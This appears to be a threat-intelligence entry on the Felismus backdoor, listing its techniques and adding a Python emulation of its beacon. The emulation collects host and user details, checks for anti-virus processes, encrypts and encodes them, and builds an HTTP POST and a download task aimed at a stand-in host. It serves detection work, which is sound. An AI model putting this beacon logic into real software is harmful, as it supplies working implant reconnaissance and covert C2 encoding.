Felismus

Felismus is a modular backdoor that has been used by Sowbug. [1] [2]

ID: S0171
Type: MALWARE
Platforms: Windows
Version: 1.0

Techniques Used

Domain ID Name Use
Enterprise T1059 Command-Line Interface

Felismus uses the command line for execution.[2]

Enterprise T1024 Custom Cryptographic Protocol

Some Felismus samples encrypt C2 traffic with a custom scheme that layers AES encryption, base64 encoding, and multiple keys.[2]

Enterprise T1036 Masquerading

Felismus has masqueraded as legitimate Adobe Content Management System files.[2]

Enterprise T1105 Remote File Copy

Felismus can download files from remote servers.[2]

Enterprise T1063 Security Software Discovery

Felismus checks for processes associated with anti-virus vendors.[2]

Enterprise T1071 Standard Application Layer Protocol

Felismus uses HTTP for C2.[2]

Enterprise T1032 Standard Cryptographic Protocol

Some Felismus samples use AES to encrypt C2 traffic.[2]

Enterprise T1082 System Information Discovery

Felismus collects system information, including the hostname and OS version, and sends it to the C2 server.[2]

Enterprise T1016 System Network Configuration Discovery

Felismus collects the victim LAN IP address and sends it to the C2 server.[2]

Enterprise T1033 System Owner/User Discovery

Felismus collects the current username and sends it to the C2 server.[2]
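The discovery, encoding and C2 behaviours listed above (T1082, T1016, T1033, T1063, T1024/T1032 and T1071) form one beacon pattern: profile the host, check for anti-virus processes, encrypt the result, base64-encode it and post it over HTTP, with a separately keyed reply coming back. The following is an added emulation of that pattern for exercising detections; it is not Felismus code and its message format, field names, URI, AV process list and keys are all constructed for the example. Because the Python standard library has no AES, the cipher is an HMAC-SHA256 counter-mode keystream standing in for AES; everything else (per-direction keys, base64 layer, HTTP POST transport, server-side decode) matches the technique descriptions.

```python
"""Emulation of the beacon pattern described on this page (added example, not
Felismus code): collect hostname, OS version, LAN IP and username, note any
anti-virus vendor processes, encrypt with a per-direction key, base64-encode
and send as an HTTP POST body; the server side decodes it and answers under a
second key. Stdlib only: the HMAC-SHA256 keystream below stands in for AES."""
import base64, getpass, hashlib, hmac, json, os, platform, socket, struct

# Constructed list of process names associated with AV vendors (illustrative).
AV_PROCESS_NAMES = {"msmpeng.exe", "avp.exe", "ccsvchst.exe",
                    "mcshield.exe", "avgnt.exe", "ekrn.exe"}

# "Multiple keys": one key per direction. Constructed values, not real keys.
KEY_CLIENT_TO_SERVER = hashlib.sha256(b"example-request-key").digest()
KEY_SERVER_TO_CLIENT = hashlib.sha256(b"example-response-key").digest()


def keystream_xor(key, nonce, data):
    """Counter-mode keystream from HMAC-SHA256 (stand-in for AES); symmetric."""
    out = bytearray()
    for block, i in enumerate(range(0, len(data), 32)):
        ks = hmac.new(key, nonce + struct.pack(">I", block), hashlib.sha256).digest()
        out.extend(b ^ k for b, k in zip(data[i:i + 32], ks))
    return bytes(out)


def encrypt_and_encode(key, plaintext):
    """Encrypt, prepend the random nonce, then base64 (the page's outer layer)."""
    nonce = os.urandom(16)
    return base64.b64encode(nonce + keystream_xor(key, nonce, plaintext)).decode()


def decode_and_decrypt(key, token):
    raw = base64.b64decode(token)
    return keystream_xor(key, raw[:16], raw[16:])


def security_software_present(process_names):
    """T1063: AV-associated names found among the running process names."""
    return sorted({p.lower() for p in process_names if p.lower() in AV_PROCESS_NAMES})


def lan_ip():
    """T1016: pick the LAN address by routing toward a non-local peer.
    UDP connect() sends nothing; TEST-NET-1 (192.0.2.1) is never reached."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        s.connect(("192.0.2.1", 9))
        return s.getsockname()[0]
    except OSError:          # no route in an isolated sandbox
        return "127.0.0.1"
    finally:
        s.close()


def host_profile(process_names):
    """T1082 / T1016 / T1033 / T1063: the fields the page says are reported."""
    try:
        user = getpass.getuser()
    except Exception:        # no passwd entry or env vars in some sandboxes
        user = "unknown"
    return {"hostname": socket.gethostname(),
            "os": f"{platform.system()} {platform.release()}",
            "lan_ip": lan_ip(),
            "user": user,
            "av": security_software_present(process_names)}


def build_beacon(profile):
    """Client side: JSON -> encrypt (request key) -> base64 -> HTTP POST (T1071)."""
    body = encrypt_and_encode(KEY_CLIENT_TO_SERVER, json.dumps(profile).encode())
    return ("POST /update HTTP/1.1\r\nHost: example.invalid\r\n"      # constructed URI/host
            "Content-Type: application/x-www-form-urlencoded\r\n"
            f"Content-Length: {len(body)}\r\n\r\n{body}")


def parse_beacon(request):
    """Server side: strip HTTP headers, base64-decode, decrypt, parse JSON."""
    headers, _, body = request.partition("\r\n\r\n")
    if not headers.startswith("POST "):
        raise ValueError("not a beacon POST")
    return json.loads(decode_and_decrypt(KEY_CLIENT_TO_SERVER, body))


def build_task(task):
    """Server reply under the second key, e.g. a download task (T1105)."""
    return encrypt_and_encode(KEY_SERVER_TO_CLIENT, json.dumps(task).encode())


def parse_task(token):
    return json.loads(decode_and_decrypt(KEY_SERVER_TO_CLIENT, token))


if __name__ == "__main__":
    # Constructed process list to exercise the AV check.
    prof = host_profile(["explorer.exe", "MsMpEng.exe", "chrome.exe"])
    req = build_beacon(prof)
    print(req)                       # what a proxy or IDS would see
    print(parse_beacon(req))         # what the server recovers
    print(parse_task(build_task({"cmd": "download", "url": "http://example.invalid/x"})))
```

The beacon on the wire is an HTTP POST whose body is base64 that decodes to high-entropy bytes with no recognisable structure, which is the signal a network detection for this behaviour keys on; the decoded profile only appears once the right direction key is applied, and applying the reply key to a request yields noise rather than an error, so the two-key split also defeats naive single-key decoders.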

Groups That Use This Software

ID Name References
G0054 Sowbug [1]

References